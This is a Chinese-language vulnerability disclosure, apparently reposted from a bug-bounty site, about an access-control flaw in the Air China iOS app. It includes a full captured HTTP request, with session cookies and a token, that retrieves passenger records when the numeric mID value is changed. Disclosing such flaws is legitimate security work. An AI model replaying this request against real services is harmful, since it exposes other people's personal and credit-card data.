首页 » 漏洞 » 中国国际航空客户端存在严重设计缺陷可查看任意用户个人信息

中国国际航空客户端存在严重设计缺陷可查看任意用户个人信息

 

1、目标:中国国航IOS客户端

2、问题描述:查看乘机人信息、查看订单、查看信用卡、查看常用联系人信息多处存在越权。烦以mID的值为数值的查询信息的都存在越权,mID的值为字母的为测越权,你们可以内查下哈。

数据包如下:

code 区域
POST https://m.airchina.com.cn:9061/worklight/apps/services/api/AirChina/iphone/query HTTP/1.1

Host: m.airchina.com.cn:9061

Cookie: WL_PERSISTENT_COOKIE=02bcd324-4183-4a8c-87dc-5b181cfd148e; JSESSIONID=0000Ohfh1gyATyODbP9WiCcY4up:-1

WL-Instance-Id: v8jn5s9eiahun1qdrcn4q2pjpp

x-wl-clientlog-model: iPhone4,1

Connection: keep-alive

X-Requested-With: XMLHttpRequest

Proxy-Connection: keep-alive

Accept-Encoding: gzip, deflate

Accept-Language: zh-Hans

User-Agent: AirChina/3.0.3.3 (iPhone; iOS 7.0.4; Scale/2.00)/WLNativeAPI/6.3.0.0

Accept: */*

x-wl-platform-version: 6.3.0.0

x-wl-clientlog-appname: AirChina

x-wl-clientlog-env: iphone

x-wl-clientlog-appversion: 1.0

x-wl-clientlog-osversion: 7.0.4

Content-Type: application/x-www-form-urlencoded; charset=utf-8

x-wl-analytics-tracking-id: 7DF54E2E-8469-4F5C-BDE3-389B533073D8

x-wl-clientlog-deviceId: 942A18F1-5379-426C-BA5A-3EBF48A64438

Content-Length: 376

x-wl-app-version: 1.0



__wl_deviceCtx=Aqaxby_o_yh7pBAA&adapter=ACPassenger&compressResponse=true&isAjaxRequest=true&parameters=%5B



%7B%22req%22%3A%22%7B%5Cn++%5C%22mId%5C%22+%3A+%5C%221507248637728%5C%22%2C%5Cn++%5C%22type%5C%22+%3A+%5C



%221%5C%22%5Cn%7D%22%2C%22lang%22%3A%22zh_CN%22%2C%22token%22%3A



%2284d2dee26b85377bd993a412370b39ffc2c834fe0e9c59ca2edd84b09a6435dd%22%7D%5D&procedure=qryPassengers

中国国际航空客户端存在严重设计缺陷可查看任意用户个人信息

漏洞证明:

中国国际航空客户端存在严重设计缺陷可查看任意用户个人信息

中国国际航空客户端存在严重设计缺陷可查看任意用户个人信息

中国国际航空客户端存在严重设计缺陷可查看任意用户个人信息

修复方案:

mID最后加密一下

原文链接:中国国际航空客户端存在严重设计缺陷可查看任意用户个人信息,转载请注明来源!

0